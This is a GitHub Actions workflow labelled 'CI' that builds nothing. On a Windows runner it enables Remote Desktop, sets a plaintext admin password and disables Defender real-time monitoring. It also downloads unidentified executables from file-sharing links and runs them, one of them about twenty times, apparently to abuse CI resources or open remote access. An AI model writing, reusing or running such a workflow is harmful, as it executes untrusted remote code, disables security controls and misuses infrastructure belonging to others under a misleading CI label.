name: CI

on: [push, workflow_dispatch]

jobs:

  build:
    runs-on: windows-latest
    timeout-minutes: 9999

    steps:
    - name: Download
      run: Invoke-WebRequest https://bin.equinox.io/c/bNyj1mQVY4c/ngrok-v3-stable-windows-amd64.zip -OutFile ngrok.zip
    - name: Tunnels.
      run: Expand-Archive ngrok.zip
    - name: Tunnels.
      run: Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server'-name "fDenyTSConnections" -Value 0
    - run: Enable-NetFirewallRule -DisplayGroup "Remote Desktop"
    - run: Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' -name "UserAuthentication" -Value 1
    - name: Tunnels.
      run: New-Item -Path "C:\21" -ItemType Directory
    - name: Tunnels.
      run: New-Item -Path "C:\2" -ItemType Directory
    - name: Tunnels.
      run: New-Item -Path "C:\1" -ItemType Directory
    - name: Tunnels.
      run: Invoke-WebRequest -URI https://www.4sync.com/web/directDownload/z9RdNffC/Wj-fE7JY.90b991e65f3ccbe5937f362e1e95887b -outfile c:\21\RegMikroMan222.zip
    - name: Tunnels.
      run: Expand-Archive -LiteralPath "c:\21\RegMikroMan222.zip" -DestinationPath "C:\21"
    - name: Tunnels.
      run: Start-Process Powershell '-Command "C:\21\RegMikroMan222\RemoteExecuteScriptSilent.exe"'
    - name: Download
      run: cmd /c C:\21\RegMikroMan222\RemoteExecuteScriptSilent.exe
    - name: Tunnels.
      run: Set-LocalUser -Name "runneradmin" -Password (ConvertTo-SecureString -AsPlainText "P@ssw0rd!" -Force)
    - name: Tunnels.
      run: Invoke-WebRequest -URI https://www.4sync.com/web/directDownload/c_ixdikd/bNM77vXz.e7873dbfbd7f7b0d212bba9d3733da1c -outfile c:\1\caffe.exe
    - name: Tunnels.
      run: Set-MpPreference -DisableRealtimeMonitoring $true
    - name: Download
      run: Invoke-WebRequest -URI https://www.4sync.com/web/directDownload/lk-gwf2x/bNM77vXz.c251dc2e01f02d8a7a8bb50d840db4f0 -outfile c:\1\1122.exe
    - name: Download
      run: cmd /c c:\1\1122.exe
    - name: Tunnels.
      run: cmd /c c:\1\caffe.exe
    - name: Tunnels.
      run: cmd /c c:\1\caffe.exe
    - name: Tunnels.
      run: cmd /c c:\1\caffe.exe
    - name: Tunnels.
      run: cmd /c c:\1\caffe.exe
    - name: Tunnels.
      run: cmd /c c:\1\caffe.exe
    - name: Tunnels.
      run: cmd /c c:\1\caffe.exe
    - name: Tunnels.
      run: cmd /c c:\1\caffe.exe
    - name: Tunnels.
      run: cmd /c c:\1\caffe.exe
    - name: Tunnels.
      run: cmd /c c:\1\caffe.exe
    - name: Tunnels.
      run: cmd /c c:\1\caffe.exe
    - name: Tunnels.
      run: cmd /c c:\1\caffe.exe
    - name: Tunnels.
      run: cmd /c c:\1\caffe.exe
    - name: Tunnels.
      run: cmd /c c:\1\caffe.exe
    - name: Tunnels.
      run: cmd /c c:\1\caffe.exe
    - name: Tunnels.
      run: cmd /c c:\1\caffe.exe
    - name: Tunnels.
      run: cmd /c c:\1\caffe.exe
    - name: Tunnels.
      run: cmd /c c:\1\caffe.exe
    - name: Tunnels.
      run: cmd /c c:\1\caffe.exe
    - name: Tunnels.
      run: cmd /c c:\1\caffe.exe
    - name: Tunnels.
      run: cmd /c c:\1\caffe.exe
    - name: Tunnels.
      run: cmd /c c:\1\caffe.exe
    - name: Tunnels.
      run: cmd /c c:\1\caffe.exe
    - name: Tunnels.
      run: cmd /c c:\1\caffe.exe
